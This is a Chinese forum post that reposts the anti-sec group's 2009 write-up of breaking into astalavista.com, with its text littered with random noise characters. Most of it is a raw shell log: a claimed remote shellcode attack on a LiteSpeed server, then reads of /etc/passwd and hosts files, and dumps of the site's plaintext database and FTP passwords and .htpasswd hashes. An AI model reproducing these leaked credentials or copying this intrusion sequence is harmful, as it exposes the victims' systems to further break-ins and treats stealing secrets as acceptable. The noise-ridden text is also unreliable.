里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
0 d% w+ z: G& v
m( z8 T* ]' ?2 @[root@front3 ~]# curl -I litespeedtech.com* I4 K$ \0 S w* b7 _9 F% `; _
HTTP/1.1 200 OK9 `4 S4 N# P, ]" g
Date: Fri, 05 Jun 2009 22:54:51 GMT' \6 x6 R* D0 x) v7 S
Server: LiteSpeed/ U/ v9 `$ I/ `
0 i. F, t. c; f& u另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-3 [0 k7 ^) j. A1 v1 N
g, Q$ M& s0 ]2 A0 H& f
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。+ Z' g; Y& c# T- h1 E9 a$ c& k
' |6 J- j5 U. o# u5 S" A
- ?. C8 g Q9 ~8 K
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 6 u$ ]: z! \, T% |+ I( K
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \4 _. v4 U$ P- Z3 I- C+ Q# W# Q
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \4 Z' Y. K! d) M" I$ M" b
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
# T0 t' @& j6 o# @) f& Y \/ \/ \/ \/ \/ \/ \/
3 l! C, C6 m5 o' y' c S4 Q3 b The Hacking & Security Community2 d4 R: L7 Z; A: j6 G" O" p
[+] Founded in 1997 by a hacker computer enthusiast" _, ^8 L+ M5 B$ d2 y6 ?
[-] Exposed in 2009 by anti-sec group
& |# _6 ]5 y& t/ F
$ Y( k) f& z* N2 ~! C/ R. R% lFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
, E% H( ~( `3 F2 _$ Q% ~6 P) A>> 03. Who’s behind the site?/ z5 Z2 Q6 u. ?/ C2 ~. B6 r
>>2 S$ L1 A% K8 [
>> A team of security and IT professionals, and a countless number of contributors from all over the world.& B. W: q+ p* R% c& \4 m
# ]. Y! ^. y7 X" L7 l
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?! x% t( j' Q6 W7 v
>>/ O1 s6 f% r$ L
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
1 |0 Q; Q+ D0 n1 Ymilitary institutions.
$ v% Z o1 d5 B>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
+ I% }: [ O3 E9 f$ Z, p" ]9 N2 c6 h1 O# e8 T5 [/ R/ j4 x
Why has Astalavista been targeted?
3 ~ ]6 B4 `" |5 P( [
v0 B$ G+ w1 F. w$ {- }Other than the fact that they are not doing any of this for the “community” but j9 x$ ^; i' P7 P; u
for the money, they spread exploits for kids, claim to be a security community
7 c& K6 S; G* v+ T(with no real sense of security on their own servers), and they charge you $6.66/ ]& V( }* w% ?' v1 A- J4 O( Q0 e
per months to access a dead forum with a directory filled with public releases
" i, I# I6 O" S& `7 K* Land outdated / broken services.
0 a9 v7 P& {0 v$ Z t( O; z4 N" c7 e: ]: E: u
We wanted to see how good that “team of security and IT professionals” really is.
6 ?& o) u5 G3 _% T$ N7 ]
( |) a0 b) D" x7 }/ p1 I/ `Let’s begin." ^* w- B: T; b0 h( r/ |
+ D3 r- F8 b5 Q* n
anti-sec:~# ./g0tshell astalavista.com -p 80; K$ n0 F, g; C. b3 p2 X
[+] Connecting to astalavista.com:80
: {! i q, y. u0 W j2 E9 C[+] Grabbing banner…% y- K( S6 J% i D
LiteSpeed, q& f2 X% T- @' Z9 c% Z3 n5 L
[+] Injecting shellcode…* \& E2 x) n7 l( t/ v+ M
[-] Wait for it
- z; G+ l6 @1 \ Y# ~3 X$ U4 ]" s1 _/ p# |+ R
[~] We g0tshell
9 R9 |0 Y% j' o9 J( guname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
1 h* t6 g- r% D! y4 ~: s: e8 g: UID: uid=100(apache) gid=500(apache) groups=500(apache)
( J3 f% H" M j& ~+ M; T. A
1 _6 E6 r( u! `2 `sh-3.2$ cat /etc/passwd& D2 B. b; q& [" K v: c
root:x:0:0:root:/root:/bin/bash$ C$ i5 c1 i3 R6 z
bin:x:1:1:bin:/bin:/sbin/nologin+ x0 @* I. n1 f! n- h; D
daemon:x:2:2:daemon:/sbin:/sbin/nologin2 d. R1 J! l7 d6 ~- X
adm:x:3:4:adm:/var/adm:/sbin/nologin* s& I/ O& d) x3 M" m2 y
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
" M: N4 Y# Q9 `2 D# fsync:x:5:0:sync:/sbin:/bin/sync- R/ G7 X. L# N& Y+ @! O. U/ C1 q) @
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
# l0 @# S7 X7 i" ~' a* {halt:x:7:0:halt:/sbin:/sbin/halt) j4 @1 V6 X4 P r8 R1 m
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
. b) A. {3 q2 e% g3 I C# u( e xnews:x:9:13:news:/etc/news:
" p! ~, g. r, {8 A" b9 B5 juucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
/ h# d( { Z Koperator:x:11:0 perator:/root:/sbin/nologin( R- C: ]$ a# f- j. _, J0 U1 i u, X
games:x:12:100:games:/usr/games:/sbin/nologin
5 U/ B8 i# V9 o# Jgopher:x:13:30:gopher:/var/gopher:/sbin/nologin3 [+ z& ?5 i; b% Y; }! a
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
" p& @2 }. ~4 [$ n4 tnobody:x:99:99:Nobody:/:/sbin/nologin- V# @0 n0 ]$ [8 D) V* L2 N
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
7 M6 x& i1 P& [3 V" odbus:x:81:81:System message bus:/:/sbin/nologin
2 R5 W! y- K4 `+ `: m1 wnscd:x:28:28:NSCD Daemon:/:/sbin/nologin! r6 D5 W/ z$ g/ |: l; n: o
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
% K- V7 r3 ?( F& M# U& \0 bsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin, J! i) j6 y) v1 @* D: y
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin; M1 a7 |8 m$ X1 M
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin5 H! i1 ]: u' {6 w; r$ x1 ~
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin5 N: u% _( T3 L: S; ?# ]
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
8 I8 u# \( t/ T" G0 f6 Unfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin# l8 j& R" q! [7 G
sshd:x:74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
" G* w, Y. ~9 b9 f4 w$ ?4 w* N; ~pcap:x:77:77::/var/arpwatch:/sbin/nologin
2 c4 C! [: _4 T1 j9 j8 e7 Q2 R7 `named:x:25:25:Named:/var/named:/sbin/nologin
8 O5 x/ x; {& t- W' Dapache:x:100:500::/var/www:/bin/false
# l# y# Z% X. z K7 ~; A' Pdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
# y% h" [5 \# h M {3 I# nmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash9 v# t7 s* a5 O: ^
webapps:x:500:501::/var/www/html:/bin/bash! ]5 ]1 d- |( y# ]; K% B
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash. x+ y `; k: B7 o! W' G2 R0 y
admin:x:501:502::/home/admin:/bin/bash# W! i- U9 q; u5 W+ x
jon:x:502:503::/home/jon:/bin/bash% d$ C/ U3 O' r/ b, ~4 n7 t
com:x:503:504::/home/com:/bin/bash: `: d, Z" y1 @' l" p
ntp:x:38:38::/etc/ntp:/sbin/nologin
* `& x5 @) G( j: H7 @5 a" I6 U5 vais:x:39:39 penais Standards Based Cluster Framework:/:/sbin/nologin
7 d! {0 I$ P1 c; w* a6 t% y5 lastanet:x:504:505::/home/astanet:/bin/bash8 z! i& n* A8 U6 {4 T* w2 \
avahi:x:70:70:Avahi daemon:/:/sbin/nologin- \8 P6 X# T5 I0 a2 f
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin# z: |3 h: t+ u5 |
, W* _* N" M. D; g8 N' ?sh-3.2$ cat /etc/hosts7 b. P) Q3 y! H# ]2 R
# Do not remove the following line, or various programs o/ G' H4 U9 w: p t ?& \
# that require network functionality will fail.1 Z8 ^! C- X6 g+ E& O+ J6 R
127.0.0.1 localhost.localdomain localhost
% J4 {4 O. T; u( w! l# Q1 x7 C$ u::1 localhost6.localdomain6 localhost6
% R" F3 R- s8 g! V/ p0 ?2 R80.74.154.172 asta1.astalavistaserver.com
) o. ^( e$ v7 S, K3 p# p/ Q8 R7 F. b3 e8 I% ]' N, x$ D, p
sh-3.2$ pwd/ o- V$ f* H) o. Q# P
/home/com/public_html
3 A# t6 z7 B$ h) c' [) o- E+ ?% j. E0 m- Y0 W- @& ~2 M
sh-3.2$ ls -la
- T* w6 b' @+ T. y1 B. ]total 18460: c4 q' D6 E% [: K8 l: R
drwxr-xr-x 30 com apache 4096 May 28 17:06 .* V1 X2 `& `( R; {2 [" a; V# B& v
drwx–x–x 11 com com 4096 Jun 25 2008 ..
' q' z2 Y7 q# `* b, C- ^drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin& l6 k, }. G1 Q- d$ g9 o, F6 E
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
3 ^$ _9 i& k* X0 R3 xdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin% c- W/ n# R. X7 G. v
drwxrwxrwx 2 com com 4096 May 19 00:50 config$ ~5 H, Q2 q. e' O. s8 ]
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core; L% n' ?9 |. j
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
7 }% R x/ g' v& M9 |/ Y+ Ndrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
+ Y" r$ W( K' H- Xdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo: u2 a2 d/ j; |6 i9 T0 W2 v% |8 D7 H0 {
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
6 X/ x8 N& |. \, s) i+ \2 @-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php0 C; l5 N- s' T7 k2 f
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd# k% {% |0 G5 d
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor# k' G- C, S4 D6 C
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico" n0 d( _9 L$ c9 g8 |' p5 h: b
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed9 |; I3 ~5 T3 f. k( ~
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
" Z# T. @2 ?" R& e5 H: l! X-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
# ?4 ?$ v- [. v) ^4 n-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak! Q8 F- X/ _, V4 S& i
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
6 ~; b$ Y) {: m; c. C5 Udrwxrwxrwx 14 com com 4096 Feb 2 19:29 images0 G1 u9 l+ D' I8 A7 G5 N- E
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php3 h0 D r6 U3 W
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
% p/ E6 c0 ?0 s: w6 `0 Gdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang$ v# T; D7 M" s
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib3 z% d4 p& j: @0 _! t
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media8 X+ J0 `7 e2 Q; p) \, s
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications2 j+ E s9 x4 _
drwxr-xr-x 34 com com 4096 May 28 16:30 modules- j7 _$ {$ ], [% m$ s% p+ A) i! h
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
, m! [# z8 g, qdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
* l* Q7 }$ o2 n8 D/ B' Kdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
$ I0 c/ Y: ^) Hdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy/ v) f6 |$ `6 u4 D9 j4 H$ G
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy8 v7 T' M6 ] h! h/ l2 _ a- |, [
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt/ o4 k9 R. s, h& X$ u% b7 A4 p
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
& G3 y! ]. m2 f0 A! c; z4 Q+ {1 c-rw-r–r– 1 com com 223 Mar 30 15:32 test.php% | ` A6 A4 ~3 ~
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
/ D7 f6 C# T) y K* B$ P6 odrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
: e$ V: b" W, H/ @% G- N/ tdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam. g" M1 h$ v5 U9 q4 S7 G
7 `3 j; M9 N4 b7 P5 D
sh-3.2$ head -20 index.php$ L. B& W" x8 E. a |4 r/ O
<?php) Z5 `* O* c& G$ f3 @! _! p
, G2 ]6 } x# E& b3 _9 P! N5 G: t7 R9 `& l
/**
% R' G6 E1 y: p5 H* The main page for the CMS; _3 s4 D. G% ^! N% l( T3 f
* @copyright CONTREXX CMS - COMVATION AG
4 ^( ^4 o( _+ W* @author Comvation Development Team
) l. L7 G! O0 C. S( I( Q: J* @version v1.0.9.10.1 stable3 M+ w( |; b. c& ~% l" @; `7 K3 M$ K
* @package contrexx
3 @% r" ^4 B3 `$ P8 k* @subpackage core
: z6 ~% _1 F# _ X7 N8 H8 w" l3 g* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage8 u# w6 Y' X0 q; B# P
* @since v0.0.0.0
( U7 n8 G) G2 h! f+ L( K* @todo Capitalize all class names in project; x% L6 k. U6 O! L; h
* @uses /config/configuration.php6 t9 N9 F7 j4 j$ a- F- e
* @uses /config/settings.php
! _; h& } E, ~; ?* @uses /config/version.php5 k7 `' G! u& {9 J/ z3 _/ v( g5 t7 R( b
* @uses /core/API.php9 L- {- a9 r w5 _4 {/ s0 Q5 Z# ]# e
* @uses /core_modules/cache/index.class.php2 G0 {- R* f( Z* [7 H& b
* @uses /core/error.class.php
- O, M, j1 h6 S: n# I* @uses /core_modules/banner/index.class.php
, {* L d% }4 ^* @uses /core_modules/contact/index.class.php
, s+ j" [, f" k9 v0 c- B$ Z4 J5 R' j8 }& q/ K8 p: F- s# W
sh-3.2$ cd config/- U# n6 { B, v- f; V5 A$ E7 l
sh-3.2$ ls -la
, e1 c( r; k9 W% Ttotal 32
2 M2 u+ @1 i1 V. edrwxrwxrwx 2 com com 4096 May 19 00:50 .
5 v$ s8 v1 g. [drwxr-xr-x 30 com apache 4096 May 28 17:06 .." v1 ^) T4 o& |" |
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php3 K K# n8 x$ o: Z' C
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php) x6 U2 Y3 s f/ u
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php: c1 Q- s# l5 L; C
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
a; S6 U# b a4 h
1 ]" I; W; f& Fsh-3.2$ cat configuration.php0 E R9 H0 `0 J H2 d1 _7 d
[snip]
. Z! w# C! Q2 I$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
) Z, e% M+ M+ P5 B \* V$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
. D1 c+ R/ J, F$ n1 T0 q& `$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
9 ^7 j* t1 C/ T8 M# J$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
g# `* L9 r5 E, `) a6 D, B$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password+ N' |8 J5 H5 w3 v+ K- v" G, L
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)' F1 p/ c( @/ X- d. ?" B
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..); d' _5 N% y; ]9 b2 Z1 w6 w" p
[snip]2 ^; Z/ |$ }( q. g5 @' p
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
/ Y6 x7 m1 q9 G6 [$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode( r2 ^) ^% C& x* R; I1 a
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost( B r" M+ U% ]( x+ Q
$_FTPCONFIG['port'] = 21; // Ftp remote port
5 S- Q6 f/ L& m/ l2 N5 [9 W% M+ a( J$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
7 f; }$ U9 _# F; Q- O$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password, P6 z. F, n* l: z) p1 m
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms, g# e8 o7 v9 l' R9 W
; o" N7 k" s( k9 Vsh-3.2$ cd ..3 L9 Q3 \, O6 J6 N! p8 [. J# P7 s
sh-3.2$ cd dvd/, h9 g/ c! P! c) }% V" L
sh-3.2$ ls -la. q u) Z& P% E, i1 z( v3 T
total 2913780
$ }6 N0 i2 p9 N. p: a5 _drwxr-xr-x 2 com com 4096 Sep 9 2008 .
# L1 Y7 K+ |: q! {drwxr-xr-x 30 com apache 4096 May 28 17:06 ..4 S F$ H3 A B8 D) s5 [9 A; v
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar0 z+ }( E6 }4 b5 U
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
- }% K# Z( E5 c' F-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
: t( T$ N; b2 |, h-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
$ d" h8 T5 m0 Y' o1 U2 m* I! P# p; O5 c4 y+ I" E
sh-3.2$ cat .htaccess
. d9 r# A$ t+ c. U$ y* NauthType Basic
5 Y3 `8 A# o; P/ L% \7 s) oauthName DVD
1 M/ M* E' l! ~; |7 b6 Z6 pauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd: o3 }) g; K- J
require valid-user2 y. p- g% U+ S. J+ w( n
# _# o( n z. ^6 X0 \; Bsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd6 ~1 v# Y8 ]+ q
DVDdownload:CRD8cuY6.MPT6
4 i6 \8 Y, l% W6 BDVDdownload2:CR8a36.wluFMg
X& s( J) v+ W& s5 t/ f' {8 [7 M( Q( L p( c
sh-3.2$ cat test.php, R" o: d1 K- m; r
<?php3 h g5 Y5 T7 h1 d. k7 [% w
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
/ g- ]9 R8 u/ v# x; m$ j, T$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));8 S( \" o& T+ s" m
echo $url;! n+ S5 v/ _3 t
?>
. Q8 C( r3 K- `
5 K }4 C8 o5 Tsh-3.2$ cd modifications/' H" Q$ b" F' x. s" _
sh-3.2$ ls -la
. O, q; K7 z, I3 J" S* Etotal 32
$ u8 V+ ^+ e8 Qdrwxr-xr-x 8 com com 4096 May 11 12:48 ." C: l, B2 e/ g8 |2 q
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
0 [6 J3 m9 x+ z+ w% z# Vdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
6 l1 `! r6 N) p# Sdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs' w4 H# Q1 a/ V+ m. g
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
- G& W4 h5 L0 K0 c$ _) g9 n: S9 Udrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
3 }4 [ M) i4 D- ^7 i8 [drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
% [0 n# w' \0 m. m8 tdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
) M3 ~9 W4 ?& [- Z7 n6 {2 E" K! }0 M* r/ w. X& i; q% e: L
sh-3.2$ ls -R
& v; g8 p: F( h# d8 b. n4 s.:
2 U4 `5 [6 ^+ X/ P4 Vcom_avtng cronjobs onlinetools pjirc search _tmp3 m, l; @/ n# ]1 J" b
H' t3 ^' u# Y1 i, J4 J./com_avtng:
5 j6 _+ r: n/ z4 Zavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
{6 J! v2 a+ R4 |9 i' r/ K* i5 b. m: _ R
./com_avtng/scripts:! e# z0 M- q9 ]* E% T* k9 s
popunder.js' b. w2 F# X% {/ A& U
# W: N+ x9 T9 T" T
./cronjobs:; y# [1 z- M! E ^) b% N Y3 u
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
9 M- y" E& ?/ l) l5 T4 z6 n% b3 |; F1 T7 x! l3 U2 |
./cronjobs/tmp:+ a) f8 y" P3 A; d4 d
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
- h, D/ H) O) F, ~% H5 t: H. L2 l6 m' y7 ~ f7 a) o
./onlinetools:
3 k$ a$ E. I2 G; t; Jindex.php
, N3 |! H) s3 k' [1 k' i3 ]$ i2 t$ n3 A8 u! m
./pjirc:
" V2 ^8 |" z" N2 O# K1 Ua_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt! @4 O3 }# P' ^7 t$ S
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt- B V9 U( k1 ]. q5 S. N
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd. {- D1 t7 T) S
" L9 o2 |+ l: u/ e' j/ ^
./pjirc/img:
+ v a, d8 ], A' U1 Wange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif- V6 Z, }9 N: _8 F
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 3 C% U, R) }( S* W
verre-eau.gif
7 {/ b" K, i1 N4 E+ `- I yargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
# J/ A% L) b& v* i6 m3 r, nverre-vin.gif
( ?3 E+ K( q4 f7 V7 l5 kballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
; R. Y" c9 @* |1 C* a* ]biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif) @; p7 m: o* @' N% |
6 n: @) M$ R' l0 \ s./pjirc/snd:
: Y( r3 H! {. ]: J) v1 zbell2.au ding.au
8 q* ~. e/ y) z; \8 j& E M( o4 o1 m( \
./search:8 ]# t' A* z5 f. }4 l
searchEngines.php search.php- L$ d9 g! Q& v
" f, |. Y! Y, i9 n# ~' a3 r./_tmp:5 M, H R( S0 ]4 t
defaultPorts.php defaultPorts.txt
5 i5 Y' B1 _8 D j) l' w& Y
* }: T7 d, G7 d1 h( v* Y \sh-3.2$ cd cronjobs/
/ y/ j; k, _- F! e5 jsh-3.2$ cat exploits.php
: t3 l& \9 v, ^/ l8 P! O/ R, P[snip]$ [1 \: \6 E; w4 c6 |
$categories = array();
$ y: I3 E6 F9 G- K$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
V! P# h; E4 k8 d$expolits = file($milw0rmFile);' c+ @8 a& p F. M C
$comExploits = array();4 E1 P( u$ b3 R
[snip]
) U4 ^1 Z5 _4 ~0 ]2 L// manage data
; `: D$ E3 v7 J# \for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640* B- s- h q2 d2 P6 x. w: ?
5 c- `* V% o1 E- ^- K: E$ D) a: @
// get path and title( [ I0 n5 Q1 E# T& e9 x
$expolits[$x] = trim($expolits[$x]);
5 O8 V* x S8 D! G" J9 o, N4 ?5 l* P- ? $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));. Z' H& l) e" L5 d" j2 ?: R
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);/ h: M9 y6 m3 }
: a, M9 r5 x/ ? // check if file exists
1 y; D, P/ S/ I9 V- W% { if (file_exists($path)) {
$ e: |1 \) ^& {6 R6 C
" `# {& t6 l- a. }6 W, Y $text = file_get_contents($path);
- D* U8 M! N1 U( j4 K( o( U9 d) n4 O( {
// get content and date5 b# r t1 u0 c* m7 V9 z/ N
//$text = htmlspecialchars($text, ENT_QUOTES);
7 t( ~$ |) k& E* n $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));* W P3 O1 a$ |' V; D* R+ I
if ($tmptext != ”) {3 j$ Q+ I9 `0 K: m" t
$text = $tmptext;5 v: Y& x) q: s$ h0 G0 O! K8 O3 `+ u
} else {: J1 k, ?- j" K5 z
$text = addslashes(htmlentities($text, ENT_QUOTES));6 c1 N6 d( X2 d( D
}
7 D7 L0 R" E- }2 H $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));! R9 V! k' f" C4 W' e8 ]
$tmp = explode('-', $date);$ D: {& x7 f0 w# K
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
4 B$ _( l& v) I8 ? $cat = getCategory ($path);
& D: }1 d+ y( z. v. X& l6 y $ext = pathinfo(basename($path));0 h" c0 k: o9 |1 p8 [; w& [
$ext = $ext['extension'];9 m( R, d* Q, c8 }+ S8 z
$qStr = ”
, O; T5 Q; n1 T a/ n SELECT `id`# M2 r" e6 B& B8 u: `% N
FROM `contrexx_module_exploits`. |" t; Y6 z! Y" t
WHERE `title` = ‘” . $title . “‘
9 |1 G8 J1 ^" q: F/ v$ r3 F8 Q AND `date` = ‘” . $date . “‘
: [: D- f; B1 R X “;: P6 [0 J$ E( F @1 A
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
+ Q' Y" _& H% l% z! L $q = $_objDB->query($qStr);/ t. i' {' P2 a4 B1 F
: c! X; S* f5 {3 `0 M6 G if ($q->numRows() == 0) {, H: e1 l. |2 Q. M
% ~! N; d2 I1 o ~
// prepare array5 u/ O* K2 i, i3 J
$comExploits[$x]['date'] = $date;& Z& O6 y t' d3 A) o/ W6 J2 M6 R* a
$comExploits[$x]['title'] = $title;
% L. ?/ C- q, f( Z& T( B) S $comExploits[$x]['author'] = ‘milw0rm’;
6 ?( _9 D) k0 Z $comExploits[$x]['text'] = $text;# H) _" l# g6 A# P( |9 l! G
$comExploits[$x]['source'] = $ext;' V" Z' |$ H$ w
$comExploits[$x]['url1'] = ”;$ A- `. c% W5 X
$comExploits[$x]['url2'] = ”;* {, i9 a, l) Y0 F- {
$comExploits[$x]['catid'] = $cat;
" M X4 t7 M& [; }, _- m $comExploits[$x]['lang'] = ‘2′;
4 {- W5 e" n- u$ `! E. h$ Q7 h" n3 _% E $comExploits[$x]['userid'] = ‘12′;
1 J- [2 F0 h. u# y: P $comExploits[$x]['startdate'] = ‘0000-00-00′; n) X: u+ d% F; B
$comExploits[$x]['enddate'] = ‘0000-00-00′;
4 ?: M+ B7 t7 T$ Y2 C: C $comExploits[$x]['status'] = ‘1′;2 T" R: ^, K3 \; A, @
$comExploits[$x]['changelog'] = $date;
9 Q# C* `; J O7 `/ p7 t: k. I
) U0 ` d3 K% p7 f) }4 g }
4 A# u2 o0 U- U0 t: `/ X( `- w[snip]- V# W: u2 i h o
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>! p3 X2 b+ q7 J/ V( a
<rss version=”2.0″>8 n# D) C2 g& N; |7 [1 j
<channel>
" M' O/ q# l0 @$ W* R <title>ASTALAVISTA.com - Exploits</title>
3 l" @. w9 v5 n, Q <link>http://www.astalavista.com/exploits</link>
# p i; Z; t& L& P <description>All availably Exploits.</description>
3 c2 s' h0 f+ _3 y G <language>en-us</language>+ c3 e( o& ?( ? D- @4 @- A
